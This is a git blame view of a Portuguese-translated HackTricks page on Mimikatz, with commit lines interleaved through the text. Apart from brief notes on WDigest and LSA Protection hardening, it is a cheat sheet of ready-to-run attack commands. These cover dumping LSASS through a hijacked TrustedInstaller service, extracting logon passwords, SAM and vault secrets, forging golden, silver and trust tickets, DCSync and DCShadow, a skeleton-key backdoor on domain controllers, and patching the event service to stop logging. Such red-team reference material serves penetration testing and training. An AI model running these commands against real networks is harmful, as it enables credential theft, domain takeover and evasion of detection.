Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-12-20 01:55:46 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/windows-hardening/stealing-credentials/credentials-mimikatz.md

215 lines
10 KiB
Markdown
Raw Normal View History

GitBook: [#3372] No subject
2022-08-13 23:06:40 +00:00
# Mimikatz
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
<details>
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
<summary>Support HackTricks</summary>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
{% endhint %}
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['forensics/basic-forensic-methodology/README.md', 'forensics
2024-02-09 01:28:17 +00:00
**Esta página é baseada em uma do [adsecurity.org](https://adsecurity.org/?page\_id=1821)**. Confira o original para mais informações!
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
## LM e Senhas em Texto Claro na Memória
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
A partir do Windows 8.1 e Windows Server 2012 R2, medidas significativas foram implementadas para proteger contra o roubo de credenciais:
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['forensics/basic-forensic-methodology/README.md', 'forensics
2024-02-09 01:28:17 +00:00
- **Hashes LM e senhas em texto claro** não são mais armazenados na memória para aumentar a segurança. Uma configuração específica do registro, _HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "UseLogonCredential"_, deve ser configurada com um valor DWORD de `0` para desativar a Autenticação Digest, garantindo que senhas "em texto claro" não sejam armazenadas em cache no LSASS.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
- **Proteção LSA** é introduzida para proteger o processo da Autoridade de Segurança Local (LSA) contra leitura não autorizada de memória e injeção de código. Isso é alcançado marcando o LSASS como um processo protegido. A ativação da Proteção LSA envolve:
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
1. Modificar o registro em _HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa_ definindo `RunAsPPL` para `dword:00000001`.
2. Implementar um Objeto de Política de Grupo (GPO) que aplica essa alteração de registro em dispositivos gerenciados.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
Apesar dessas proteções, ferramentas como Mimikatz podem contornar a Proteção LSA usando drivers específicos, embora tais ações provavelmente sejam registradas nos logs de eventos.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
### Combatendo a Remoção do SeDebugPrivilege
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
Administradores normalmente têm SeDebugPrivilege, permitindo que eles depurem programas. Este privilégio pode ser restrito para evitar despejos de memória não autorizados, uma técnica comum usada por atacantes para extrair credenciais da memória. No entanto, mesmo com esse privilégio removido, a conta TrustedInstaller ainda pode realizar despejos de memória usando uma configuração de serviço personalizada:
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
```bash
sc config TrustedInstaller binPath= "C:\\Users\\Public\\procdump64.exe -accepteula -ma lsass.exe C:\\Users\\Public\\lsass.dmp"
Adding in bypass when SeDebugPrivilege is revoked
2023-03-29 20:47:22 +00:00
sc start TrustedInstaller
```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
Isso permite o despejo da memória do `lsass.exe` para um arquivo, que pode então ser analisado em outro sistema para extrair credenciais:
Adding in bypass when SeDebugPrivilege is revoked
2023-03-29 20:47:22 +00:00
```
# privilege::debug
# sekurlsa::minidump lsass.dmp
# sekurlsa::logonpasswords
```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
## Mimikatz Options
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
A manipulação de logs de eventos no Mimikatz envolve duas ações principais: limpar logs de eventos e corrigir o serviço de Eventos para evitar o registro de novos eventos. Abaixo estão os comandos para realizar essas ações:
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
#### Clearing Event Logs
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
- **Command**: Esta ação tem como objetivo deletar os logs de eventos, dificultando o rastreamento de atividades maliciosas.
- O Mimikatz não fornece um comando direto em sua documentação padrão para limpar logs de eventos diretamente via sua linha de comando. No entanto, a manipulação de logs de eventos geralmente envolve o uso de ferramentas de sistema ou scripts fora do Mimikatz para limpar logs específicos (por exemplo, usando PowerShell ou Visualizador de Eventos do Windows).
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
#### Experimental Feature: Patching the Event Service
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
- **Command**: `event::drop`
- Este comando experimental é projetado para modificar o comportamento do Serviço de Registro de Eventos, efetivamente impedindo-o de registrar novos eventos.
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
- Exemplo: `mimikatz "privilege::debug" "event::drop" exit`
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
- O comando `privilege::debug` garante que o Mimikatz opere com os privilégios necessários para modificar serviços do sistema.
- O comando `event::drop` então corrige o serviço de Registro de Eventos.
Translated to Portuguese
2023-06-06 18:56:34 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
### Kerberos Ticket Attacks
Translated to Portuguese
2023-06-06 18:56:34 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
### Golden Ticket Creation
Translated to Portuguese
2023-06-06 18:56:34 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
Um Golden Ticket permite a impersonação de acesso em todo o domínio. Comando e parâmetros principais:
Translated to Portuguese
2023-06-06 18:56:34 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
- Command: `kerberos::golden`
- Parameters:
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
- `/domain`: O nome do domínio.
- `/sid`: O Identificador de Segurança (SID) do domínio.
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
- `/user`: O nome de usuário a ser impersonado.
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
- `/krbtgt`: O hash NTLM da conta de serviço KDC do domínio.
- `/ptt`: Injeta diretamente o ticket na memória.
- `/ticket`: Salva o ticket para uso posterior.
Translated to Portuguese
2023-06-06 18:56:34 +00:00
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
Exemplo:
```bash
mimikatz "kerberos::golden /user:admin /domain:example.com /sid:S-1-5-21-123456789-123456789-123456789 /krbtgt:ntlmhash /ptt" exit
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
### Criação de Silver Ticket
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
Silver Tickets concedem acesso a serviços específicos. Comando e parâmetros principais:
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
- Comando: Semelhante ao Golden Ticket, mas direciona serviços específicos.
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
- Parâmetros:
- `/service`: O serviço a ser direcionado (por exemplo, cifs, http).
- Outros parâmetros semelhantes ao Golden Ticket.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
Exemplo:
```bash
mimikatz "kerberos::golden /user:user /domain:example.com /sid:S-1-5-21-123456789-123456789-123456789 /target:service.example.com /service:cifs /rc4:ntlmhash /ptt" exit
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
### Criação de Ticket de Confiança
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
Tickets de Confiança são usados para acessar recursos entre domínios aproveitando relacionamentos de confiança. Comando e parâmetros principais:
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
- Comando: Semelhante ao Golden Ticket, mas para relacionamentos de confiança.
- Parâmetros:
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
- `/target`: O FQDN do domínio alvo.
- `/rc4`: O hash NTLM para a conta de confiança.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
Exemplo:
```bash
mimikatz "kerberos::golden /domain:child.example.com /sid:S-1-5-21-123456789-123456789-123456789 /sids:S-1-5-21-987654321-987654321-987654321-519 /rc4:ntlmhash /user:admin /service:krbtgt /target:parent.example.com /ptt" exit
GitBook: [#2777] gitbookissooooo slow I cannot write
2021-10-18 11:21:18 +00:00
```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
### Comandos Adicionais do Kerberos
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
- **Listar Tickets**:
- Comando: `kerberos::list`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
- Lista todos os tickets do Kerberos para a sessão do usuário atual.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
- **Passar o Cache**:
- Comando: `kerberos::ptc`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
- Injeta tickets do Kerberos a partir de arquivos de cache.
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
- Exemplo: `mimikatz "kerberos::ptc /ticket:ticket.kirbi" exit`
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
- **Passar o Ticket**:
- Comando: `kerberos::ptt`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
- Permite usar um ticket do Kerberos em outra sessão.
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
- Exemplo: `mimikatz "kerberos::ptt /ticket:ticket.kirbi" exit`
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
- **Limpar Tickets**:
- Comando: `kerberos::purge`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
- Limpa todos os tickets do Kerberos da sessão.
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
- Útil antes de usar comandos de manipulação de tickets para evitar conflitos.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
### Manipulação do Active Directory
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
- **DCShadow**: Faz uma máquina agir temporariamente como um DC para manipulação de objetos do AD.
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
- `mimikatz "lsadump::dcshadow /object:targetObject /attribute:attributeName /value:newValue" exit`
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
- **DCSync**: Imitando um DC para solicitar dados de senha.
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
- `mimikatz "lsadump::dcsync /user:targetUser /domain:targetDomain" exit`
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
### Acesso a Credenciais
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
- **LSADUMP::LSA**: Extrai credenciais do LSA.
- `mimikatz "lsadump::lsa /inject" exit`
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
- **LSADUMP::NetSync**: Imitar um DC usando os dados de senha de uma conta de computador.
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
- *Nenhum comando específico fornecido para NetSync no contexto original.*
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
- **LSADUMP::SAM**: Acessar o banco de dados SAM local.
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
- `mimikatz "lsadump::sam" exit`
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
- **LSADUMP::Secrets**: Descriptografar segredos armazenados no registro.
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
- `mimikatz "lsadump::secrets" exit`
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
- **LSADUMP::SetNTLM**: Definir um novo hash NTLM para um usuário.
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
- `mimikatz "lsadump::setntlm /user:targetUser /ntlm:newNtlmHash" exit`
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
- **LSADUMP::Trust**: Recuperar informações de autenticação de confiança.
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
- `mimikatz "lsadump::trust" exit`
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
### Diversos
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
- **MISC::Skeleton**: Injeta um backdoor no LSASS em um DC.
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
- `mimikatz "privilege::debug" "misc::skeleton" exit`
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
### Escalação de Privilégios
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
- **PRIVILEGE::Backup**: Adquirir direitos de backup.
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
- `mimikatz "privilege::backup" exit`
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
- **PRIVILEGE::Debug**: Obter privilégios de depuração.
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
- `mimikatz "privilege::debug" exit`
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
### Extração de Credenciais
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
- **SEKURLSA::LogonPasswords**: Mostrar credenciais de usuários logados.
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
- `mimikatz "sekurlsa::logonpasswords" exit`
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
- **SEKURLSA::Tickets**: Extrair tickets do Kerberos da memória.
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
- `mimikatz "sekurlsa::tickets /export" exit`
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
### Manipulação de SID e Token
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
- **SID::add/modify**: Alterar SID e SIDHistory.
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
- Adicionar: `mimikatz "sid::add /user:targetUser /sid:newSid" exit`
- Modificar: *Nenhum comando específico para modificar no contexto original.*
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
- **TOKEN::Elevate**: Imitar tokens.
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
- `mimikatz "token::elevate /domainadmin" exit`
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
### Serviços de Terminal
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
- **TS::MultiRDP**: Permitir múltiplas sessões RDP.
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
- `mimikatz "ts::multirdp" exit`
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
- **TS::Sessions**: Listar sessões TS/RDP.
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
- *Nenhum comando específico fornecido para TS::Sessions no contexto original.*
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
### Cofre
GitBook: [#2810] update
2021-10-26 21:32:15 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
- Extrair senhas do Cofre do Windows.
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
- `mimikatz "vault::cred /patch" exit`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 16:14:51 +00:00
{% hint style="success" %}
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Suporte ao HackTricks</summary>
* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
{% endhint %}
Reference in a new issue Copy permalink